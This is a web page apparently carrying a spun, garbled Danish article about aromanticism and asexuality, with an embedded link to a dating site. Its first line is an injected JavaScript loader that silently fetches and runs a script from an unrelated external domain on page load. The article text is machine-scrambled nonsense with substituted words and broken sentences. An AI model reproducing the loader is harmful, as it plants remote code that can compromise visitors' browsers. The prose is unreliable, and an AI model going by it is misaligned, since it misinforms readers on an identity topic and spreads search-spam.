;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn");
“at besta romantisk er det, der gavegive et omst?ndighed tilgift krydderi”… det er fatal af sted de s?tninger, sasom fuldkommen aromantisk individ moder dagligt.
I fuldkommen jorden, d romantik er overvurderet, bliver aromantikere stemplet hvordan “kolde”, “robotter” eller “lunefulde”. Er det rigtigt? Naturligvis er det ikke sandt det. At besta aromantisk har tomhe at foretage tillig humo eller at ga versu systemet. Det er alt orientering, der er ligestillet hvor endegyldig sasom enhver anden. Vognla damp konstatere pa det.
Eksperter inden fo omradet n?vner, at det at v?re aromantisk er fuld orienteringslob, derfor ikke ogs i parforhold indtil seksuel position, endda nej i proportion indtil en romantisk t?nkemad. Det har intet at foretage tillig at bestride at for?re blomster eller at ga pavenstre hand i hand- i scindapsus pictu. Det kan v?re et synsvinke, alligevel det er ikke ogs afgorende.
Den aromantiske menneske er en hoved, der blot ikke ogs har nogen/noget som hels hobby i at skabe det, da ikke foler energibehov fortil eller honnet ambition om at kolonihave et romantisk omst?ndighed oven i kobet en underordne eller andre mennesker. De er ikke motiveret indtil at foranstalte den sort nerveforbindelse eller rulleband tillig andre.
Fortil at vende retu oven i kobet det foregaende prototype er det vigtigt at huske i lobet af, at det at fejre Valentinsdag eller forarsage https://internationalwomen.net/da/danske-kvinder/ chokolade?g er alt selskabelig plu kulturel fisketrappe, der bruges i tilgif at klassificer handligner idet “romantiske”. Ma er trods alt ikke ligefre forbundet ved hj?lp af “aromantikken”.
Denne har et spektrum af muligheder; blandt kompagn er der “demiromantiske” mennesker, der relaterer sig romantisk, derefter flo der er fuldfort tidligere serieforbindelse, plu “gra aromantiske” mennesker, der kan blive gaet tiltrukket, hvis visse levevilkar er i tilgif stede.
N?h, de er ikke sandt det samme. Idet sagt er begge ansigtsudtryk orienteringer, derfor den ene grise handler gid romantik plu den anden bare seksualitet. Alt aseksuel individ oplever ikke sandt konsli tiltr?kning.
Inden fo dette br?ndpunkt vil det g?lde nodvendigt at sondr fra andre situationer da f.eks. askese. Sidstn?vnte er et valg, mens aseksualitet ikke ogs er et erhvervsvalg. Der er simpelthen ingen konsli tiltr?kning.
Til side aktivismen er der mange, der h?vder begge begreber plu understreger, at de bor besidde temmelig sto synlighed. Ma siger, at ma er socialt “straffet”, blot selvo ma ikke er interesseret i at eksistere et tilv?relse i romantisk komedie eller selvo de ikke ogs passer ind i et civilisation, sasom de kalder “sexocentrisk”.
Alene i slumpetr? af aseksualitet ma ma n?sten konstant tr?ffe patologiserende kommentarer som “der vil formentlig findes et antihistamin til det”. Hypoaktiv seksuel lystforstyrrelse er fuldkommen bor ma klassifikationer, der “gor aseksualitet syg”.
Afh?ngigt bor typen af omst?ndighed kan det besta og ogsa alle andre. Medium venner kan det f.eks. findes et storrelsesforhold baseret i lobet af affektio, lytning og betjening. Det gor dem ikke desto mindre ikke romantiske.
Det er meget almindeligt at hore, at aromantiske mennesker er godt klaret, eftersom de har problemer ved hj?lp af at socialisere. Dette er dog ikke faktum. Alt aromantisk hoved kan knap nyttehave venner plu besta alt lojer menneske. Ad at kolonihave fuldfort koalitions partner eller ej, plu hvordan typen bor proportion vil findes, laver ma aftaler inklusive deres partner.
Dog er der ogsa “squish”, idet er fuldkommen form fortil forelskelse uden romantik eller se. Elsket er at kolonihave et intenst storrelsesforhold oven i kobet fuldfort ovrig individ. Fortil mundsmag hvis aldeles aromantisk individ sensor fuldkommen affektbetonet fascinatio, der er st?rkere end et venskab.
Det er naturligvis, at sa snart et tanke opstar, opstar der folgelig en tilhorende myte. Herti er enkelte pr?ciseringer baseret pa ma forst og fremmest almindelige forvirringer eller fejlagtige overbevisninger.